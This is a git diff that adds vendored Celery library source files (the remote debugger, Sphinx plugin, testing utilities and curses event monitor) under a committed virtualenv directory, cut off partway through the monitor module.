Holds the currently active debugger. +_current = [None] + +_frame = getattr(sys, '_getframe') + +NO_AVAILABLE_PORT = """\ +{self.ident}: Couldn't find an available port. + +Please specify one using the CELERY_RDB_PORT environment variable. +""" + +BANNER = """\ +{self.ident}: Ready to connect: telnet {self.host} {self.port} + +Type `exit` in session to continue. + +{self.ident}: Waiting for client... +""" + +SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.' +SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.' + + +class Rdb(Pdb): + """Remote debugger.""" + + me = 'Remote Debugger' + _prev_outs = None + _sock = None + + def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT, + port_search_limit=100, port_skew=+0, out=sys.stdout): + self.active = True + self.out = out + + self._prev_handles = sys.stdin, sys.stdout + + self._sock, this_port = self.get_avail_port( + host, port, port_search_limit, port_skew, + ) + self._sock.setblocking(1) + self._sock.listen(1) + self.ident = f'{self.me}:{this_port}' + self.host = host + self.port = this_port + self.say(BANNER.format(self=self)) + + self._client, address = self._sock.accept() + self._client.setblocking(1) + self.remote_addr = ':'.join(str(v) for v in address) + self.say(SESSION_STARTED.format(self=self)) + self._handle = sys.stdin = sys.stdout = self._client.makefile('rw') + super().__init__(completekey='tab', + stdin=self._handle, stdout=self._handle) + + def get_avail_port(self, host, port, search_limit=100, skew=+0): + try: + _, skew = current_process().name.split('-') + skew = int(skew) + except ValueError: + pass + this_port = None + for i in range(search_limit): + _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + _sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + this_port = port + skew + i + try: + _sock.bind((host, this_port)) + except OSError as exc: + if exc.errno in [errno.EADDRINUSE, errno.EINVAL]: + continue + raise + else: + return _sock, this_port + raise Exception(NO_AVAILABLE_PORT.format(self=self)) + + def say(self, m): + print(m, file=self.out) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self._close_session() + + def _close_session(self): + self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles + if self.active: + if self._handle is not None: + self._handle.close() + if self._client is not None: + self._client.close() + if self._sock is not None: + self._sock.close() + self.active = False + self.say(SESSION_ENDED.format(self=self)) + + def do_continue(self, arg): + self._close_session() + self.set_continue() + return 1 + do_c = do_cont = do_continue + + def do_quit(self, arg): + self._close_session() + self.set_quit() + return 1 + do_q = do_exit = do_quit + + def set_quit(self): + # this raises a BdbQuit exception that we're unable to catch. + sys.settrace(None) + + +def debugger(): + """Return the current debugger instance, or create if none.""" + rdb = _current[0] + if rdb is None or not rdb.active: + rdb = _current[0] = Rdb() + return rdb + + +def set_trace(frame=None): + """Set break-point at current location, or a specified frame.""" + if frame is None: + frame = _frame().f_back + return debugger().set_trace(frame) diff --git a/env/Lib/site-packages/celery/contrib/sphinx.py b/env/Lib/site-packages/celery/contrib/sphinx.py new file mode 100644 index 00000000..a5505ff1 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/sphinx.py @@ -0,0 +1,105 @@ +"""Sphinx documentation plugin used to document tasks. + +Introduction +============ + +Usage +----- + +The Celery extension for Sphinx requires Sphinx 2.0 or later. + +Add the extension to your :file:`docs/conf.py` configuration module: + +.. code-block:: python + + extensions = (..., + 'celery.contrib.sphinx') + +If you'd like to change the prefix for tasks in reference documentation +then you can change the ``celery_task_prefix`` configuration value: + +.. code-block:: python + + celery_task_prefix = '(task)' # < default + +With the extension installed `autodoc` will automatically find +task decorated objects (e.g. when using the automodule directive) +and generate the correct (as well as add a ``(task)`` prefix), +and you can also refer to the tasks using `:task:proj.tasks.add` +syntax. + +Use ``.. autotask::`` to alternatively manually document a task. +""" +from inspect import signature + +from docutils import nodes +from sphinx.domains.python import PyFunction +from sphinx.ext.autodoc import FunctionDocumenter + +from celery.app.task import BaseTask + + +class TaskDocumenter(FunctionDocumenter): + """Document task definitions.""" + + objtype = 'task' + member_order = 11 + + @classmethod + def can_document_member(cls, member, membername, isattr, parent): + return isinstance(member, BaseTask) and getattr(member, '__wrapped__') + + def format_args(self): + wrapped = getattr(self.object, '__wrapped__', None) + if wrapped is not None: + sig = signature(wrapped) + if "self" in sig.parameters or "cls" in sig.parameters: + sig = sig.replace(parameters=list(sig.parameters.values())[1:]) + return str(sig) + return '' + + def document_members(self, all_members=False): + pass + + def check_module(self): + # Normally checks if *self.object* is really defined in the module + # given by *self.modname*. But since functions decorated with the @task + # decorator are instances living in the celery.local, we have to check + # the wrapped function instead. + wrapped = getattr(self.object, '__wrapped__', None) + if wrapped and getattr(wrapped, '__module__') == self.modname: + return True + return super().check_module() + + +class TaskDirective(PyFunction): + """Sphinx task directive.""" + + def get_signature_prefix(self, sig): + return [nodes.Text(self.env.config.celery_task_prefix)] + + +def autodoc_skip_member_handler(app, what, name, obj, skip, options): + """Handler for autodoc-skip-member event.""" + # Celery tasks created with the @task decorator have the property + # that *obj.__doc__* and *obj.__class__.__doc__* are equal, which + # trips up the logic in sphinx.ext.autodoc that is supposed to + # suppress repetition of class documentation in an instance of the + # class. This overrides that behavior. + if isinstance(obj, BaseTask) and getattr(obj, '__wrapped__'): + if skip: + return False + return None + + +def setup(app): + """Setup Sphinx extension.""" + app.setup_extension('sphinx.ext.autodoc') + app.add_autodocumenter(TaskDocumenter) + app.add_directive_to_domain('py', 'task', TaskDirective) + app.add_config_value('celery_task_prefix', '(task)', True) + app.connect('autodoc-skip-member', autodoc_skip_member_handler) + + return { + 'parallel_read_safe': True + } diff --git a/env/Lib/site-packages/celery/contrib/testing/__init__.py b/env/Lib/site-packages/celery/contrib/testing/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/contrib/testing/app.py b/env/Lib/site-packages/celery/contrib/testing/app.py new file mode 100644 index 00000000..95ed700b --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/app.py @@ -0,0 +1,112 @@ +"""Create Celery app instances used for testing.""" +import weakref +from contextlib import contextmanager +from copy import deepcopy + +from kombu.utils.imports import symbol_by_name + +from celery import Celery, _state + +#: Contains the default configuration values for the test app. +DEFAULT_TEST_CONFIG = { + 'worker_hijack_root_logger': False, + 'worker_log_color': False, + 'accept_content': {'json'}, + 'enable_utc': True, + 'timezone': 'UTC', + 'broker_url': 'memory://', + 'result_backend': 'cache+memory://', + 'broker_heartbeat': 0, +} + + +class Trap: + """Trap that pretends to be an app but raises an exception instead. + + This to protect from code that does not properly pass app instances, + then falls back to the current_app. + """ + + def __getattr__(self, name): + # Workaround to allow unittest.mock to patch this object + # in Python 3.8 and above. + if name == '_is_coroutine' or name == '__func__': + return None + print(name) + raise RuntimeError('Test depends on current_app') + + +class UnitLogging(symbol_by_name(Celery.log_cls)): + """Sets up logging for the test application.""" + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.already_setup = True + + +def TestApp(name=None, config=None, enable_logging=False, set_as_current=False, + log=UnitLogging, backend=None, broker=None, **kwargs): + """App used for testing.""" + from . import tasks # noqa + config = dict(deepcopy(DEFAULT_TEST_CONFIG), **config or {}) + if broker is not None: + config.pop('broker_url', None) + if backend is not None: + config.pop('result_backend', None) + log = None if enable_logging else log + test_app = Celery( + name or 'celery.tests', + set_as_current=set_as_current, + log=log, + broker=broker, + backend=backend, + **kwargs) + test_app.add_defaults(config) + return test_app + + +@contextmanager +def set_trap(app): + """Contextmanager that installs the trap app. + + The trap means that anything trying to use the current or default app + will raise an exception. + """ + trap = Trap() + prev_tls = _state._tls + _state.set_default_app(trap) + + class NonTLS: + current_app = trap + _state._tls = NonTLS() + + try: + yield + finally: + _state._tls = prev_tls + + +@contextmanager +def setup_default_app(app, use_trap=False): + """Setup default app for testing. + + Ensures state is clean after the test returns. + """ + prev_current_app = _state.get_current_app() + prev_default_app = _state.default_app + prev_finalizers = set(_state._on_app_finalizers) + prev_apps = weakref.WeakSet(_state._apps) + + try: + if use_trap: + with set_trap(app): + yield + else: + yield + finally: + _state.set_default_app(prev_default_app) + _state._tls.current_app = prev_current_app + if app is not prev_current_app: + app.close() + _state._on_app_finalizers = prev_finalizers + _state._apps = prev_apps diff --git a/env/Lib/site-packages/celery/contrib/testing/manager.py b/env/Lib/site-packages/celery/contrib/testing/manager.py new file mode 100644 index 00000000..23f43b16 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/manager.py @@ -0,0 +1,239 @@ +"""Integration testing utilities.""" +import socket +import sys +from collections import defaultdict +from functools import partial +from itertools import count +from typing import Any, Callable, Dict, Sequence, TextIO, Tuple # noqa + +from kombu.exceptions import ContentDisallowed +from kombu.utils.functional import retry_over_time + +from celery import states +from celery.exceptions import TimeoutError +from celery.result import AsyncResult, ResultSet # noqa +from celery.utils.text import truncate +from celery.utils.time import humanize_seconds as _humanize_seconds + +E_STILL_WAITING = 'Still waiting for {0}. Trying again {when}: {exc!r}' + +humanize_seconds = partial(_humanize_seconds, microseconds=True) + + +class Sentinel(Exception): + """Signifies the end of something.""" + + +class ManagerMixin: + """Mixin that adds :class:`Manager` capabilities.""" + + def _init_manager(self, + block_timeout=30 * 60.0, no_join=False, + stdout=None, stderr=None): + # type: (float, bool, TextIO, TextIO) -> None + self.stdout = sys.stdout if stdout is None else stdout + self.stderr = sys.stderr if stderr is None else stderr + self.connerrors = self.app.connection().recoverable_connection_errors + self.block_timeout = block_timeout + self.no_join = no_join + + def remark(self, s, sep='-'): + # type: (str, str) -> None + print(f'{sep}{s}', file=self.stdout) + + def missing_results(self, r): + # type: (Sequence[AsyncResult]) -> Sequence[str] + return [res.id for res in r if res.id not in res.backend._cache] + + def wait_for( + self, + fun, # type: Callable + catch, # type: Sequence[Any] + desc="thing", # type: str + args=(), # type: Tuple + kwargs=None, # type: Dict + errback=None, # type: Callable + max_retries=10, # type: int + interval_start=0.1, # type: float + interval_step=0.5, # type: float + interval_max=5.0, # type: float + emit_warning=False, # type: bool + **options # type: Any + ): + # type: (...) -> Any + """Wait for event to happen. + + The `catch` argument specifies the exception that means the event + has not happened yet. + """ + kwargs = {} if not kwargs else kwargs + + def on_error(exc, intervals, retries): + interval = next(intervals) + if emit_warning: + self.warn(E_STILL_WAITING.format( + desc, when=humanize_seconds(interval, 'in', ' '), exc=exc, + )) + if errback: + errback(exc, interval, retries) + return interval + + return self.retry_over_time( + fun, catch, + args=args, kwargs=kwargs, + errback=on_error, max_retries=max_retries, + interval_start=interval_start, interval_step=interval_step, + **options + ) + + def ensure_not_for_a_while(self, fun, catch, + desc='thing', max_retries=20, + interval_start=0.1, interval_step=0.02, + interval_max=1.0, emit_warning=False, + **options): + """Make sure something does not happen (at least for a while).""" + try: + return self.wait_for( + fun, catch, desc=desc, max_retries=max_retries, + interval_start=interval_start, interval_step=interval_step, + interval_max=interval_max, emit_warning=emit_warning, + ) + except catch: + pass + else: + raise AssertionError(f'Should not have happened: {desc}') + + def retry_over_time(self, *args, **kwargs): + return retry_over_time(*args, **kwargs) + + def join(self, r, propagate=False, max_retries=10, **kwargs): + if self.no_join: + return + if not isinstance(r, ResultSet): + r = self.app.ResultSet([r]) + received = [] + + def on_result(task_id, value): + received.append(task_id) + + for i in range(max_retries) if max_retries else count(0): + received[:] = [] + try: + return r.get(callback=on_result, propagate=propagate, **kwargs) + except (socket.timeout, TimeoutError) as exc: + waiting_for = self.missing_results(r) + self.remark( + 'Still waiting for {}/{}: [{}]: {!r}'.format( + len(r) - len(received), len(r), + truncate(', '.join(waiting_for)), exc), '!', + ) + except self.connerrors as exc: + self.remark(f'join: connection lost: {exc!r}', '!') + raise AssertionError('Test failed: Missing task results') + + def inspect(self, timeout=3.0): + return self.app.control.inspect(timeout=timeout) + + def query_tasks(self, ids, timeout=0.5): + tasks = self.inspect(timeout).query_task(*ids) or {} + yield from tasks.items() + + def query_task_states(self, ids, timeout=0.5): + states = defaultdict(set) + for hostname, reply in self.query_tasks(ids, timeout=timeout): + for task_id, (state, _) in reply.items(): + states[state].add(task_id) + return states + + def assert_accepted(self, ids, interval=0.5, + desc='waiting for tasks to be accepted', **policy): + return self.assert_task_worker_state( + self.is_accepted, ids, interval=interval, desc=desc, **policy + ) + + def assert_received(self, ids, interval=0.5, + desc='waiting for tasks to be received', **policy): + return self.assert_task_worker_state( + self.is_received, ids, interval=interval, desc=desc, **policy + ) + + def assert_result_tasks_in_progress_or_completed( + self, + async_results, + interval=0.5, + desc='waiting for tasks to be started or completed', + **policy + ): + return self.assert_task_state_from_result( + self.is_result_task_in_progress, + async_results, + interval=interval, desc=desc, **policy + ) + + def assert_task_state_from_result(self, fun, results, + interval=0.5, **policy): + return self.wait_for( + partial(self.true_or_raise, fun, results, timeout=interval), + (Sentinel,), **policy + ) + + @staticmethod + def is_result_task_in_progress(results, **kwargs): + possible_states = (states.STARTED, states.SUCCESS) + return all(result.state in possible_states for result in results) + + def assert_task_worker_state(self, fun, ids, interval=0.5, **policy): + return self.wait_for( + partial(self.true_or_raise, fun, ids, timeout=interval), + (Sentinel,), **policy + ) + + def is_received(self, ids, **kwargs): + return self._ids_matches_state( + ['reserved', 'active', 'ready'], ids, **kwargs) + + def is_accepted(self, ids, **kwargs): + return self._ids_matches_state(['active', 'ready'], ids, **kwargs) + + def _ids_matches_state(self, expected_states, ids, timeout=0.5): + states = self.query_task_states(ids, timeout=timeout) + return all( + any(t in s for s in [states[k] for k in expected_states]) + for t in ids + ) + + def true_or_raise(self, fun, *args, **kwargs): + res = fun(*args, **kwargs) + if not res: + raise Sentinel() + return res + + def wait_until_idle(self): + control = self.app.control + with self.app.connection() as connection: + # Try to purge the queue before we start + # to attempt to avoid interference from other tests + while True: + count = control.purge(connection=connection) + if count == 0: + break + + # Wait until worker is idle + inspect = control.inspect() + inspect.connection = connection + while True: + try: + count = sum(len(t) for t in inspect.active().values()) + except ContentDisallowed: + # test_security_task_done may trigger this exception + break + if count == 0: + break + + +class Manager(ManagerMixin): + """Test helpers for task integration tests.""" + + def __init__(self, app, **kwargs): + self.app = app + self._init_manager(**kwargs) diff --git a/env/Lib/site-packages/celery/contrib/testing/mocks.py b/env/Lib/site-packages/celery/contrib/testing/mocks.py new file mode 100644 index 00000000..4ec79145 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/mocks.py @@ -0,0 +1,137 @@ +"""Useful mocks for unit testing.""" +import numbers +from datetime import datetime, timedelta +from typing import Any, Mapping, Sequence # noqa +from unittest.mock import Mock + +from celery import Celery # noqa +from celery.canvas import Signature # noqa + + +def TaskMessage( + name, # type: str + id=None, # type: str + args=(), # type: Sequence + kwargs=None, # type: Mapping + callbacks=None, # type: Sequence[Signature] + errbacks=None, # type: Sequence[Signature] + chain=None, # type: Sequence[Signature] + shadow=None, # type: str + utc=None, # type: bool + **options # type: Any +): + # type: (...) -> Any + """Create task message in protocol 2 format.""" + kwargs = {} if not kwargs else kwargs + from kombu.serialization import dumps + + from celery import uuid + id = id or uuid() + message = Mock(name=f'TaskMessage-{id}') + message.headers = { + 'id': id, + 'task': name, + 'shadow': shadow, + } + embed = {'callbacks': callbacks, 'errbacks': errbacks, 'chain': chain} + message.headers.update(options) + message.content_type, message.content_encoding, message.body = dumps( + (args, kwargs, embed), serializer='json', + ) + message.payload = (args, kwargs, embed) + return message + + +def TaskMessage1( + name, # type: str + id=None, # type: str + args=(), # type: Sequence + kwargs=None, # type: Mapping + callbacks=None, # type: Sequence[Signature] + errbacks=None, # type: Sequence[Signature] + chain=None, # type: Sequence[Signature] + **options # type: Any +): + # type: (...) -> Any + """Create task message in protocol 1 format.""" + kwargs = {} if not kwargs else kwargs + from kombu.serialization import dumps + + from celery import uuid + id = id or uuid() + message = Mock(name=f'TaskMessage-{id}') + message.headers = {} + message.payload = { + 'task': name, + 'id': id, + 'args': args, + 'kwargs': kwargs, + 'callbacks': callbacks, + 'errbacks': errbacks, + } + message.payload.update(options) + message.content_type, message.content_encoding, message.body = dumps( + message.payload, + ) + return message + + +def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage): + # type: (Celery, Signature, bool, Any) -> Any + """Create task message from :class:`celery.Signature`. + + Example: + >>> m = task_message_from_sig(app, add.s(2, 2)) + >>> amqp_client.basic_publish(m, exchange='ex', routing_key='rkey') + """ + sig.freeze() + callbacks = sig.options.pop('link', None) + errbacks = sig.options.pop('link_error', None) + countdown = sig.options.pop('countdown', None) + if countdown: + eta = app.now() + timedelta(seconds=countdown) + else: + eta = sig.options.pop('eta', None) + if eta and isinstance(eta, datetime): + eta = eta.isoformat() + expires = sig.options.pop('expires', None) + if expires and isinstance(expires, numbers.Real): + expires = app.now() + timedelta(seconds=expires) + if expires and isinstance(expires, datetime): + expires = expires.isoformat() + return TaskMessage( + sig.task, id=sig.id, args=sig.args, + kwargs=sig.kwargs, + callbacks=[dict(s) for s in callbacks] if callbacks else None, + errbacks=[dict(s) for s in errbacks] if errbacks else None, + eta=eta, + expires=expires, + utc=utc, + **sig.options + ) + + +class _ContextMock(Mock): + """Dummy class implementing __enter__ and __exit__. + + The :keyword:`with` statement requires these to be implemented + in the class, not just the instance. + """ + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + pass + + +def ContextMock(*args, **kwargs): + """Mock that mocks :keyword:`with` statement contexts.""" + obj = _ContextMock(*args, **kwargs) + obj.attach_mock(_ContextMock(), '__enter__') + obj.attach_mock(_ContextMock(), '__exit__') + obj.__enter__.return_value = obj + # if __exit__ return a value the exception is ignored, + # so it must return None here. + obj.__exit__.return_value = None + return obj diff --git a/env/Lib/site-packages/celery/contrib/testing/tasks.py b/env/Lib/site-packages/celery/contrib/testing/tasks.py new file mode 100644 index 00000000..a372a20f --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/tasks.py @@ -0,0 +1,9 @@ +"""Helper tasks for integration tests.""" +from celery import shared_task + + +@shared_task(name='celery.ping') +def ping(): + # type: () -> str + """Simple task that just returns 'pong'.""" + return 'pong' diff --git a/env/Lib/site-packages/celery/contrib/testing/worker.py b/env/Lib/site-packages/celery/contrib/testing/worker.py new file mode 100644 index 00000000..fa8f6889 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/testing/worker.py @@ -0,0 +1,221 @@ +"""Embedded workers for integration tests.""" +import logging +import os +import threading +from contextlib import contextmanager +from typing import Any, Iterable, Union # noqa + +import celery.worker.consumer # noqa +from celery import Celery, worker # noqa +from celery.result import _set_task_join_will_block, allow_join_result +from celery.utils.dispatch import Signal +from celery.utils.nodenames import anon_nodename + +WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error') + +test_worker_starting = Signal( + name='test_worker_starting', + providing_args={}, +) +test_worker_started = Signal( + name='test_worker_started', + providing_args={'worker', 'consumer'}, +) +test_worker_stopped = Signal( + name='test_worker_stopped', + providing_args={'worker'}, +) + + +class TestWorkController(worker.WorkController): + """Worker that can synchronize on being fully started.""" + + logger_queue = None + + def __init__(self, *args, **kwargs): + # type: (*Any, **Any) -> None + self._on_started = threading.Event() + + super().__init__(*args, **kwargs) + + if self.pool_cls.__module__.split('.')[-1] == 'prefork': + from billiard import Queue + self.logger_queue = Queue() + self.pid = os.getpid() + + try: + from tblib import pickling_support + pickling_support.install() + except ImportError: + pass + + # collect logs from forked process. + # XXX: those logs will appear twice in the live log + self.queue_listener = logging.handlers.QueueListener(self.logger_queue, logging.getLogger()) + self.queue_listener.start() + + class QueueHandler(logging.handlers.QueueHandler): + def prepare(self, record): + record.from_queue = True + # Keep origin record. + return record + + def handleError(self, record): + if logging.raiseExceptions: + raise + + def start(self): + if self.logger_queue: + handler = self.QueueHandler(self.logger_queue) + handler.addFilter(lambda r: r.process != self.pid and not getattr(r, 'from_queue', False)) + logger = logging.getLogger() + logger.addHandler(handler) + return super().start() + + def on_consumer_ready(self, consumer): + # type: (celery.worker.consumer.Consumer) -> None + """Callback called when the Consumer blueprint is fully started.""" + self._on_started.set() + test_worker_started.send( + sender=self.app, worker=self, consumer=consumer) + + def ensure_started(self): + # type: () -> None + """Wait for worker to be fully up and running. + + Warning: + Worker must be started within a thread for this to work, + or it will block forever. + """ + self._on_started.wait() + + +@contextmanager +def start_worker( + app, # type: Celery + concurrency=1, # type: int + pool='solo', # type: str + loglevel=WORKER_LOGLEVEL, # type: Union[str, int] + logfile=None, # type: str + perform_ping_check=True, # type: bool + ping_task_timeout=10.0, # type: float + shutdown_timeout=10.0, # type: float + **kwargs # type: Any +): + # type: (...) -> Iterable + """Start embedded worker. + + Yields: + celery.app.worker.Worker: worker instance. + """ + test_worker_starting.send(sender=app) + + worker = None + try: + with _start_worker_thread(app, + concurrency=concurrency, + pool=pool, + loglevel=loglevel, + logfile=logfile, + perform_ping_check=perform_ping_check, + shutdown_timeout=shutdown_timeout, + **kwargs) as worker: + if perform_ping_check: + from .tasks import ping + with allow_join_result(): + assert ping.delay().get(timeout=ping_task_timeout) == 'pong' + + yield worker + finally: + test_worker_stopped.send(sender=app, worker=worker) + + +@contextmanager +def _start_worker_thread(app, + concurrency=1, + pool='solo', + loglevel=WORKER_LOGLEVEL, + logfile=None, + WorkController=TestWorkController, + perform_ping_check=True, + shutdown_timeout=10.0, + **kwargs): + # type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable + """Start Celery worker in a thread. + + Yields: + celery.worker.Worker: worker instance. + """ + setup_app_for_worker(app, loglevel, logfile) + if perform_ping_check: + assert 'celery.ping' in app.tasks + # Make sure we can connect to the broker + with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn: + conn.default_channel.queue_declare + + worker = WorkController( + app=app, + concurrency=concurrency, + hostname=anon_nodename(), + pool=pool, + loglevel=loglevel, + logfile=logfile, + # not allowed to override TestWorkController.on_consumer_ready + ready_callback=None, + without_heartbeat=kwargs.pop("without_heartbeat", True), + without_mingle=True, + without_gossip=True, + **kwargs) + + t = threading.Thread(target=worker.start, daemon=True) + t.start() + worker.ensure_started() + _set_task_join_will_block(False) + + try: + yield worker + finally: + from celery.worker import state + state.should_terminate = 0 + t.join(shutdown_timeout) + if t.is_alive(): + raise RuntimeError( + "Worker thread failed to exit within the allocated timeout. " + "Consider raising `shutdown_timeout` if your tasks take longer " + "to execute." + ) + state.should_terminate = None + + +@contextmanager +def _start_worker_process(app, + concurrency=1, + pool='solo', + loglevel=WORKER_LOGLEVEL, + logfile=None, + **kwargs): + # type (Celery, int, str, Union[int, str], str, **Any) -> Iterable + """Start worker in separate process. + + Yields: + celery.app.worker.Worker: worker instance. + """ + from celery.apps.multi import Cluster, Node + + app.set_current() + cluster = Cluster([Node('testworker1@%h')]) + cluster.start() + try: + yield + finally: + cluster.stopwait() + + +def setup_app_for_worker(app, loglevel, logfile) -> None: + # type: (Celery, Union[str, int], str) -> None + """Setup the app to be used for starting an embedded worker.""" + app.finalize() + app.set_current() + app.set_default() + type(app.log)._setup = False + app.log.setup(loglevel=loglevel, logfile=logfile) diff --git a/env/Lib/site-packages/celery/events/__init__.py b/env/Lib/site-packages/celery/events/__init__.py new file mode 100644 index 00000000..8e509fb7 --- /dev/null +++ b/env/Lib/site-packages/celery/events/__init__.py @@ -0,0 +1,15 @@ +"""Monitoring Event Receiver+Dispatcher. + +Events is a stream of messages sent for certain actions occurring +in the worker (and clients if :setting:`task_send_sent_event` +is enabled), used for monitoring purposes. +""" + +from .dispatcher import EventDispatcher +from .event import Event, event_exchange, get_exchange, group_from +from .receiver import EventReceiver + +__all__ = ( + 'Event', 'EventDispatcher', 'EventReceiver', + 'event_exchange', 'get_exchange', 'group_from', +) diff --git a/env/Lib/site-packages/celery/events/cursesmon.py b/env/Lib/site-packages/celery/events/cursesmon.py new file mode 100644 index 00000000..cff26bef --- /dev/null +++ b/env/Lib/site-packages/celery/events/cursesmon.py @@ -0,0 +1,534 @@ +"""Graphical monitor of Celery events using curses.""" + +import curses +import sys +import threading +from datetime import datetime +from itertools import count +from math import ceil +from textwrap import wrap +from time import time + +from celery import VERSION_BANNER, states +from celery.app import app_or_default +from celery.utils.text import abbr, abbrtask + +__all__ = ('CursesMonitor', 'evtop') + +BORDER_SPACING = 4 +LEFT_BORDER_OFFSET = 3 +UUID_WIDTH = 36 +STATE_WIDTH = 8 +TIMESTAMP_WIDTH = 8 +MIN_WORKER_WIDTH = 15 +MIN_TASK_WIDTH = 16 + +# this module is considered experimental +# we don't care about coverage. + +STATUS_SCREEN = """\ +events: {s.event_count} tasks:{s.task_count} workers:{w_alive}/{w_all} +""" + + +class CursesMonitor: # pragma: no cover + """A curses based Celery task monitor.""" + + keymap = {} + win = None + screen_delay = 10 + selected_task = None + selected_position = 0 + selected_str = 'Selected: ' + foreground = curses.COLOR_BLACK + background = curses.COLOR_WHITE + online_str = 'Workers online: ' + help_title = 'Keys: ' + help = ('j:down k:up i:info t:traceback r:result c:revoke ^c: quit') + greet = f'celery events {VERSION_BANNER}' + info_str = 'Info: ' + + def __init__(self, state, app, keymap=None): + self.app = app + self.keymap = keymap or self.keymap + self.state = state + default_keymap = { + 'J': self.move_selection_down, + 'K': self.move_selection_up, + 'C': self.revoke_selection, + 'T': self.selection_traceback, + 'R': self.selection_result, + 'I': self.selection_info, + 'L': self.selection_rate_limit, + } + self.keymap = dict(default_keymap, **self.keymap) + self.lock = threading.RLock() + + def format_row(self, uuid, task, worker, timestamp, state): + mx = self.display_width + + # include spacing + detail_width = mx - 1 - STATE_WIDTH - 1 - TIMESTAMP_WIDTH + uuid_space = detail_width - 1 - MIN_TASK_WIDTH - 1 - MIN_WORKER_WIDTH + + if uuid_space < UUID_WIDTH: + uuid_width = uuid_space + else: + uuid_width = UUID_WIDTH + + detail_width = detail_width - uuid_width - 1 + task_width = int(ceil(detail_width / 2.0)) + worker_width = detail_width - task_width - 1 + + uuid = abbr(uuid, uuid_width).ljust(uuid_width) + worker = abbr(worker, worker_width).ljust(worker_width) + task = abbrtask(task, task_width).ljust(task_width) + state = abbr(state, STATE_WIDTH).ljust(STATE_WIDTH) + timestamp = timestamp.ljust(TIMESTAMP_WIDTH) + + row = f'{uuid} {worker} {task} {timestamp} {state} ' + if self.screen_width is None: + self.screen_width = len(row[:mx]) + return row[:mx] + + @property + def screen_width(self): + _, mx = self.win.getmaxyx() + return mx + + @property + def screen_height(self): + my, _ = self.win.getmaxyx() + return my + + @property + def display_width(self): + _, mx = self.win.getmaxyx() + return mx - BORDER_SPACING + + @property + def display_height(self): + my, _ = self.win.getmaxyx() + return my - 10 + + @property + def limit(self): + return self.display_height + + def find_position(self): + if not self.tasks: + return 0 + for i, e in enumerate(self.tasks): + if self.selected_task == e[0]: + return i + return 0 + + def move_selection_up(self): + self.move_selection(-1) + + def move_selection_down(self): + self.move_selection(1) + + def move_selection(self, direction=1): + if not self.tasks: + return + pos = self.find_position() + try: + self.selected_task = self.tasks[pos + direction][0] + except IndexError: + self.selected_task = self.tasks[0][0] + + keyalias = {curses.KEY_DOWN: 'J', + curses.KEY_UP: 'K', + curses.KEY_ENTER: 'I'} + + def handle_keypress(self): + try: + key = self.win.getkey().upper() + except Exception: # pylint: disable=broad-except + return + key = self.keyalias.get(key) or key + handler = self.keymap.get(key) + if handler is not None: + handler() + + def alert(self, callback, title=None): + self.win.erase() + my, mx = self.win.getmaxyx() + y = blank_line = count(2) + if title: + self.win.addstr(next(y), 3, title, + curses.A_BOLD | curses.A_UNDERLINE) + next(blank_line) + callback(my, mx, next(y)) + self.win.addstr(my - 1, 0, 'Press any key to continue...', + curses.A_BOLD) + self.win.refresh() + while 1: + try: + return self.win.getkey().upper() + except Exception: # pylint: disable=broad-except + pass + + def selection_rate_limit(self): + if not self.selected_task: + return curses.beep() + task = self.state.tasks[self.selected_task] + if not task.name: + return curses.beep() + + my, mx = self.win.getmaxyx() + r = 'New rate limit: ' + self.win.addstr(my - 2, 3, r, curses.A_BOLD | curses.A_UNDERLINE) + self.win.addstr(my - 2, len(r) + 3, ' ' * (mx - len(r))) + rlimit = self.readline(my - 2, 3 + len(r)) + + if rlimit: + reply = self.app.control.rate_limit(task.name, + rlimit.strip(), reply=True) + self.alert_remote_control_reply(reply) + + def alert_remote_control_reply(self, reply): + + def callback(my, mx, xs): + y = count(xs) + if not reply: + self.win.addstr( + next(y), 3, 'No replies received in 1s deadline.', + curses.A_BOLD + curses.color_pair(2), + ) + return + + for subreply in reply: + curline = next(y) + + host, response = next(subreply.items()) + host = f'{host}: ' + self.win.addstr(curline, 3, host, curses.A_BOLD) + attr = curses.A_NORMAL + text = '' + if 'error' in response: + text = response['error'] + attr |= curses.color_pair(2) + elif 'ok' in response: + text = response['ok'] + attr |= curses.color_pair(3) + self.win.addstr(curline, 3 + len(host), text, attr) + + return self.alert(callback, 'Remote Control Command Replies') + + def readline(self, x, y): + buffer = '' + curses.echo() + try: + i = 0 + while 1: + ch = self.win.getch(x, y + i) + if ch != -1: + if ch in (10, curses.KEY_ENTER): # enter + break + if ch in (27,): + buffer = '' + break + buffer += chr(ch) + i += 1 + finally: + curses.noecho() + return buffer + + def revoke_selection(self): + if not self.selected_task: + return curses.beep() + reply = self.app.control.revoke(self.selected_task, reply=True) + self.alert_remote_control_reply(reply) + + def selection_info(self): + if not self.selected_task: + return + + def alert_callback(mx, my, xs): + my, mx = self.win.getmaxyx() + y = count(xs) + task = self.state.tasks[self.selected_task] + info = task.info(extra=['state']) + infoitems = [ + ('args', info.pop('args', None)), + ('kwargs', info.pop('kwargs', None)) + ] + list(info.items()) + for key, value in infoitems: + if key is None: + continue + value = str(value) + curline = next(y) + keys = key + ': ' + self.win.addstr(curline, 3, keys, curses.A_BOLD) + wrapped = wrap(value, mx - 2) + if len(wrapped) == 1: + self.win.addstr( + curline, len(keys) + 3, + abbr(wrapped[0], + self.screen_width - (len(keys) + 3))) + else: + for subline in wrapped: + nexty = next(y) + if nexty >= my - 1: + subline = ' ' * 4 + '[...]' + self.win.addstr( + nexty, 